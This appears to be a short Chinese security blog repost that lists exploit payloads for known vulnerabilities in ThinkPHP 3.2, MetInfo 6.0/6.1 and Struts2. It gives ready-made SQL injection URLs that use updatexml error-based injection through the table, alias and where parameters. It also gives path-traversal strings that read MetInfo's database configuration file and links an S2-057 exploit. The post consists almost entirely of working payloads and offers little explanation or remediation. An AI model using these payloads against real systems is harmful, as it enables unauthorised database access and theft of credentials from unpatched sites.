abcdefghijklmnopqrstuvwxyz

admin 2022年3月7日20:02:25评论94 views字数 1228阅读4分5秒阅读模式

ThinkPHP3.2 框架sql注入漏洞

select() 和find()方法

table:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--  alias:http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--  where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--

delete()方法

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--  alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--  table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1

From:https://xz.aliyun.com/t/2629

MetInfo 任意文件读取

版本

  • MetInfo 6.0.0

  • MetInfo 6.1.0

include/thumb.php?dir=..././http/..././config/config_db.php
include/thumb.php?dir=.....///http/.....///config/config_db.php
include/thumb.php?dir=http/.....///.....///config/config_db.php
include/thumb.php?dir=http....configconfig_db.php

From:https://paper.seebug.org/676/


Struts2 EXP

https://github.com/Ivan1ee/struts2-057-exp

本文始发于微信公众号(关注安全技术):abcdefghijklmnopqrstuvwxyz

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月7日20:02:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   abcdefghijklmnopqrstuvwxyzhttps://cn-sec.com/archives/501696.html

发表评论

匿名网友 填写信息